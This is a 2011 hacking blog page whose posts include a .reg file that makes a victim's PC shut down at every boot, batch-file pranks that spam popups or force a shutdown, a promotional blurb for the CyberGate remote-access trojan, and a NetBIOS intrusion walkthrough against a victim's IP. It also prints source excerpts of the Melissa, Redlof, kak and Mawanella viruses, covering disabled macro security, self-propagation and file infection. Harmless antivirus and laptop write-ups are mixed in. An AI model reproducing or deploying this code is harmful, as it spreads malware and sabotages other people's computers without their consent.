Let your enemy down ! Posted by Tyson , 11 May 2011 at 19:45, in Labels: Security Penetration, Source Code

Got any problem with your friend got to make them pay here is an easy way, but never use it unless it is necessary.
put this following text in a .reg file and run it in the victims pc:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"

DONT PUT IT IN your COMPUTER, I AM NOT RESPONSIBLE, if it happens, to you,
start windows in safe mode, and open registry editor by typing
REGEDIT in start->run. navigate to
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
and remove the string value named VIRUS,
restart you computer.
You can also put this in a javascript code,
just add this code to your webpage

Fun hacks with vbscript and batch files Posted by Tyson , at 08:58, in Labels: Geeks

Cycle a message  in your friends computer

open your notepad and type the following lines of code

@ECHO off
:Begin
msg * Hi
msg * Are you having fun?
msg * I am!
msg * Lets have fun together!
msg * Because you have been o-w-n-e-d
GOTO BEGIN

save it as anyfilename.bat 
run and see the magic



Convey message to your friend and shutdown his/her computer


open your notepad and type the following lines of code

@echo off
msg * I don't like you
shutdown -c "Error! You are too stupid!" -s

Save it as "Anything.BAT" and send it.

CyberGate Posted by Tyson , at 07:21, in Labels: Security Penetration

What is CyberGate:

CyberGate is a powerful, fully configurable and stable Remote Administration Tool coded in Delphi that is continuously getting developed by our experienced team. 

What it can do :

CyberGate was built to be a tool for various  possible applications, ranging from assisting Users with routine maintenance tasks, to remotely monitoring your Children, captures regular user activities and maintain a backup of your typed data automatically. It can also be used as a monitoring device for detecting unauthorized access.
CyberGate achieves this though it's abundant array of features. A few of which are illustrated below :

[+] Automatically map ports if your router supports uPnP;

[+] Multi-Threaded : allowing for multiple clients to be connected, along with increased reliability.

[+] Reverse Connection :  Some of the listed advantages of a reverse connection -  
# Outgoing connections generally are less treating, and are less likely to be detected or blocked by a firewall, such as a router.
# Since the remote's computer is connecting to the remote administrator, one does not need to know the remote's IP address in order to connect.

Winpooch Posted by Tyson , at 00:05, in Labels: Anti-Spyware

Winpooch, also called Winpooch Watchdog, is a free open source intrusion-prevention system that detects and blocks malware from computers runningMicrosoft Windows. The application only supports 32-bit Windows XP up to and including Service Pack 2

Winpooch development was ceased on 13 June 2008.

Features

Starting with version 0.6.0, kernel-mode hooking was implemented through a kernel-mode driver, allowing Winpooch to monitor the Windows kernel and system services. It was, however, notorious for causing Blue Screens of Death.

Winpooch uses a permissions system to allow or restrict individual programs from performing operations associated with the network, system registry, filesystem(including wildcards) and process control. It does this by intercepting various potentially dangerous system calls, only allowing certain user-defined applications and actions to be run. Optionally, it also supports several antivirus scanners such as ClamWin and BitDefender to actively scan files for malware before they attempt to run.

Winpooch is based on path-based rules (strictly the static paths of programs). For non-defined actions (or actions for which the user asked to be notified), the choice the user is presented with is to Accept/Feign/Reject the action or to declare a specific rule for this action. If declaring a specific rule, the user can select whether the rule should be applied quietly, reported in a log, or a screen notification.

Kernel level v0.6.0 introduced a problem of constant Blue Screens of Death as a result of Winpooch's opt-in approach for kernels, as it could only simulate pre-programmed kernels. Each new version since v0.6.0 reduced the number of kernels that were still not simulated well, but certain kernels still do not currently work with the program.

ClamWin Posted by Tyson , 09 May 2011 at 06:22, in Labels: AntiVirus

ClamWin is free, open source antivirus software for Microsoft Windows. It provides a graphical user interface to the ClamAV (Clam AntiVirus) engine.


Features

• Scanning scheduler (only effective with user logged in).
• Automatic virus database updates on a regular basis.
• Standalone virus-scanner.
• Context menu integration for Windows Explorer.
• Add-in for Microsoft Outlook.
• A portable version that can be used from a USB flash drive.

Firefox extensions exist that allow the users to process downloaded files with ClamWin.

Clam AntiVirus Posted by Tyson , 08 May 2011 at 20:08, in Labels: AntiVirus

ClamAV is an open source (GPL) antivirus engine designed for detecting Trojans, viruses, malware and other malicious threats. It is the de facto standard for mail gateway scanning. It provides a high performance mutli-threaded scanning daemon, command line utilities for on demand file scanning, and an intelligent tool for automatic signature updates. The core ClamAV library provides numerous file format detection mechanisms, file unpacking support, archive support, and multiple signature languages for detecting threats. The core ClamAV library is utilized in Immunet 3.0, powered by ClamAV, which is a fast, fully featured Desktop AV solution for Windows.


Features

ClamAV includes a number of utilities: a command-line scanner, automatic database updater and a scalable multi-threaded daemon, running on an anti-virus engine from a shared library.

The application also features a Milter interface for sendmail and on-demand scanning. It has support for Zip, RAR, Tar, Gzip, Bzip2, OLE2, Cabinet, CHM, BinHex, SIS formats, most mail file formats, ELF executables and Portable Executable (PE) files compressed with UPX, FSG, Petite, NsPack, wwpack32, MEW, Upack and obfuscated with SUE, Y0da Cryptor. It also supports many document formats, including Microsoft Office, HTML, Rich Text Format(RTF) and Portable Document Format (PDF).

The ClamAV virus database is updated several times each day and as of 21 August 2010 contained 818,106 virus signatures.

Dell Vostro V130 Posted by Tyson , at 05:34, in Labels: Gadget

Take your small business further — and farther — with the Vostro™ V130. Built on an award-winning design, this incredibly slim and light laptop packs the full-featured performance you need into a durable, featherweight profile that's ready for the road.

• Slim, sleek and striking — Razor-thin, ultralight aluminum body and intelligent Intel^® Core™ ultra-low-voltage processors help you travel lightly and work efficiently.
• Uncompromised mobile freedom — Enjoy easy on-the-go productivity with a high-definition 13.3-inch WLED display, high-speed Bluetooth^® 3.0 and a full communications suite.
• Support that goes beyond the box — With optional Dell DataSafe™ online backup and recovery, you get easy, set-and-forget protection for your business data.

NetBios hacking for windows 95/98/ME/NT/XP Posted by Tyson , 30 April 2011 at 05:29, in Labels: Security Penetration

Step 1
Get a IP (range) scanner. (superscanner is a fast one).
Scan the victim's ip on TCP/IP port 139
Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok
this is what you see: c:windows>
This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.
c:windows>nbtstat -a 255.255.255.255
If you see this your in:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered

melissa Posted by Tyson , at 05:28, in Labels: Source Code

[tt]// Melissa Virus Source Code

Private Sub Document_Open()
On Error Resume Next
If System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> ""
Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("",
"HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):
Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")

html.redlof.a (vbs, decoded) Posted by Tyson , at 05:28, in Labels: Source Code

Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
KJSetDim()
KJCreateMilieu()
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub

Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
TmpStr = ReadTemp.ReadAll
If Instr(TmpStr,"KJ_start()") <> 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
If TypeStr = "htt" Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = "html" Then
FileTemp.Write vbCrLf & "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
FileTemp.Close
End If
End Function

Function KJChangeSub(CurrentString,LastIndexChar)
If LastIndexChar = 0 Then
If Left(LCase(CurrentString),1) =< LCase("c") Then
KJChangeSub = FinalyDisk & ":\"
SubE = 0
Else
KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
SubE = 0
End If
Else
KJChangeSub = Mid(CurrentString,1,LastIndexChar)
End If
End Function

Function KJCreateMail()
On Error Resume Next
If InWhere = "html" Then
Exit Function
End If
ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
If (FSO.FileExists(ShareFile)) Then
Call KJAppendTo(ShareFile,"html")
Else
Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
FileTemp.Write "<" & "HTML>" & vbCrLf & "<" & "BODY onload=""" & "vbscript:" & "KJ_start()""" & ">" & vbCrLf & HtmlText
FileTemp.Close
End If

kak (vbs) Posted by Tyson , at 05:27, in Labels: Source Code

<DIV style=3D"POSITION: absolute; RIGHT: 0px; TOP: -20px; Z-INDEX: 5">
<OBJECT classid=3Dclsid:06290BD5-48AA-11D2-8432-006008C3FBFC=20
id=3Dscr></OBJECT></DIV><SCRIPT><!--
function sErr(){return
true;}window.onerror=sErr;scr.Reset();scr.doc="Z<HTML><HEAD><TITLE>Driver
Memory Error</"+"TITLE><HTA:APPLICATION ID=\"hO\"
WINDOWSTATE=Minimize></"+"HEAD><BODY BGCOLOR=#CCCCCC><object id='wsh'
classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></"+"object><SCRIPT>function
sEr(){self.close();return true;}window.onerror=sEr;fs=new
ActiveXObject('Scripting.FileSystemObject');wd='C:\\\\Windows\\\\';fl=fs.GetFolde
r(wd+'Applic~1\\\\Identities');sbf=fl.SubFolders;for(var

Mawanella (vbs decoded) Posted by Tyson , at 05:26, in Labels: Source Code

On Error Resume Next
Rem // I hate Mawanella incident
Set W_S = CreateObject("WScript.Shell")
Set fso = CreateObject("Scripting.FileSystemObject")
set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()

sub main()
   On Error Resume Next
   dim wscr,rr, strMsg
   set wscr=CreateObject("WScript.Shell")
      Set dirwin = fso.GetSpecialFolder(0)
      Set dirsystem = fso.GetSpecialFolder(1)
      Set dirtemp = fso.GetSpecialFolder(2)
      Set cFile = fso.GetFile(WScript.ScriptFullName)
      cFile.Copy(dirsystem&"\Mawanella.vbs")